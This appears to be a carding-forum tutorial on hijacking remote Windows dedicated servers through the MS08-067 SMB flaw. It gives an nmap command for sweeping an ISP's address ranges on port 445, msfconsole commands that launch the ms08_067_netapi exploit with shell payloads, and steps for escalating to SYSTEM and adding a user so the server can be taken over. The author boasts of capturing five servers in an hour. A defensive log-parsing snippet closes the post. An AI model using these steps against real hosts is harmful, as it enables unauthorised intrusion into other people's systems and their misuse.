Extraction of VDS - servers (Dedicated servers)

Carder

In this lecture, I will show you a method of extracting a remote Dedicated Server under Windows using Metasploit Framework using the MS08-067 vulnerability. For some reason, the exploitation of this bug is currently very popular among hackers, as evidenced by numerous posts and discussions on Facebook, although VKontakte pages dedicated to the same MSF are completely silent. In most cases, all systems running Windows XP Professional SP2 and SP3 are vulnerable (you can find a complete list of the operating systems at risk at kb.cert.org/vuls/id/827267). But in fact, all Microsoft software products can be compromised by exploiting this bug to this day.

Let's get down to work - download the latest release of the Metasploit Framework on the official website metasploit.com (or search on disk). Before installing it on the computer, disable the antivirus. The Metasploit Framework includes its own network port scanner, although we can also use the external nmap scanner to find networked Windows machines, which is also added to the distribution and installed along with the Metasploit Framework.

1. We launch the nmap scanner, marking port 445, since this is what we need for further exploitation of the server service vulnerability. And what exactly are we going to scan? The answer is quite simple - for example, you can take and scan the IP prefixes of your provider, which we can easily find on the bgp.he.net website in the "Prefixes IP v4" section.

To use the obtained prefixes in the nmap scanner, you must first copy them to a file - for example, my_isp.txt, and place the file in the working directory with nmap.

2. The command to start the scanner will look like this:

Code:
nmap -T4 -A -v -PE -PS445 -PA445 -iL my_isp.txt

Great, as a result of the scan we got a list of hosts with the server service running, which can be seen from the external network, and it is not covered by anything, although Microsoft strongly recommended blocking access to this service from the Internet back in 2008 ... Interestingly, for each host, nmap issues detailed information about the type of installed OS.

Shell types: meterpreter payload and others

It is currently believed that a fully functional Meterpreter (MP) exists only for Windows, but in reality this is not entirely true. There are several more versions of MP implemented in PHP and JAVA. However, you yourself can become the author of a "payload" - for example, compile a TCL shell-code script for Cisco IOS using the tclpro.exe utility and then use it for cruel games with iron cats.

The standard MP payload can be used with almost all Windows exploits included in the Metasploit Framework by choosing one of the following payloads:

I will briefly explain the essence of each.

1. bind_meterpreter - reserves a port on the target machine and listens for connections. After the connection is established, the Meterpreter is downloaded to the target host, the current connection continues to be used to communicate with the remote machine.
2. reverse_meterpreter - itself connects to a predefined host on the specified port for further downloading the Meterpreter. The established connection is then used to communicate with the remote machine. Everything is fine, but for the successful implementation of this method, we need a real IP address (or set the forwarding of the ports you need through NAT).
3. find_tag - searches for a descriptor of the service processed by the exploit and uses it to download the Meterpreter to the remote machine, after which the existing connection will be used to communicate with it. This kind of payload is especially interesting because it does not require opening a new connection - thus, it is possible to bypass almost any firewall configuration.
4. bind_tcp - normal command interpreter like cmd.exe, of course, without any additional bells and whistles, like in Meterpreter. It just reserves a port on the target machine and loads the standard shell.

Code:
msf> use exploit/windows/smb/ms08_067_netapi
msf exploit> set PAYLOAD windows/vncinject/bind_tcp
PAYLOAD => windows/vncinject/bind_tcp
msf exploit (ms08_067_netapi)> set RHOST 192.168.0.3
RHOST => 192.168.0.3
msf exploit (ms08_067_netapi)> exploit

If the vulnerability exists on the remote machine, then we will gain access to the shell (cmd.exe) of this computer, and a message will appear in the window stating that the session has been successfully established. In the case when msf has identified the OS as Windows 7, you can try using the 64-bit payloads that are available in the corresponding section (we search through the GUI menu), or call the payload through the console.

Server hijacking
Now, from the list of hosts generated by nmap, select an IP address running Windows 2003 Server - this will be our desired goal (after all, you, as a real network guru, should have your own Dedicated Server at least once in your life!). To work with the server, we will use the same exploit (exploit/windows/smb/ms08_067_netapi) and the bind_meterpreter payload. As a result, we gain access to the command shell through Meterpreter, after which we add a new user using the token_adduser script, having previously raised our privileges on the remote machine to the SYSTEM level using the use priv command. Well, we have a Dedicated Server that you can connect to using a remote desktop. On it we can install a proxy server, FTP and much more. During the experiment, I managed to get five Dedicated servers in about an hour. I think it's cool!

Conclusion
If someone just wants to click on the "exploit" button so that Metasploit immediately produces ready-made Dedicated servers, then I'll say right away - this will not happen: the method still takes time and patience.

An attack from a local network will most likely result in the system being completely compromised. In spite of everything, there is still a fairly wide field for experimenting with Windows security, and you can contribute to this cause.
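The whole method depends on the server service being reachable from the Internet on TCP/445, the exposure Microsoft advised closing in 2008. As an added defender-side example (not part of the original post; the log format and addresses are constructed for illustration), this Python snippet reads firewall-style records, flags accepted connections to 445 from outside RFC 1918 space, and groups them by source to surface the kind of sweep the nmap step produces:

```python
import ipaddress
import re

# Constructed sample firewall-style log (made up for this example, not real traffic).
SAMPLE_LOG = """\
2008-11-02 10:14:01 ACCEPT TCP 203.0.113.7:51234 -> 198.51.100.10:445
2008-11-02 10:14:02 ACCEPT TCP 10.0.0.5:49152 -> 10.0.0.9:445
2008-11-02 10:14:03 ACCEPT TCP 203.0.113.7:51235 -> 198.51.100.11:445
2008-11-02 10:14:04 ACCEPT TCP 203.0.113.7:51236 -> 198.51.100.12:445
2008-11-02 10:14:05 ACCEPT TCP 192.0.2.44:40001 -> 198.51.100.10:80
2008-11-02 10:14:06 DROP   TCP 203.0.113.9:50000 -> 198.51.100.10:445
"""

# RFC 1918 ranges; anything outside them is treated as external in this example.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]

LINE_RE = re.compile(
    r"^(?P<ts>\S+ \S+)\s+(?P<action>ACCEPT|DROP)\s+TCP\s+"
    r"(?P<src>[\d.]+):(?P<sport>\d+)\s+->\s+(?P<dst>[\d.]+):(?P<dport>\d+)$"
)

def parse_log(text):
    """Parse the constructed log format; lines that do not match are skipped."""
    records = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            d = m.groupdict()
            d["sport"] = int(d["sport"])
            d["dport"] = int(d["dport"])
            records.append(d)
    return records

def is_internal(addr):
    ip = ipaddress.ip_address(addr)
    return any(ip in net for net in INTERNAL_NETS)

def external_smb_accepts(records):
    """Accepted TCP/445 connections from outside RFC 1918 space: the exposure to close."""
    return [r for r in records
            if r["action"] == "ACCEPT" and r["dport"] == 445 and not is_internal(r["src"])]

def sweep_sources(hits, min_targets=2):
    """One external source reaching several hosts on 445 is the signature of a port sweep."""
    targets = {}
    for r in hits:
        targets.setdefault(r["src"], set()).add(r["dst"])
    return {src: sorted(d) for src, d in targets.items() if len(d) >= min_targets}
```

Any host that appears as a destination in the output still accepts SMB from the Internet and should have 445 filtered at the perimeter, independent of whether the MS08-067 patch is installed.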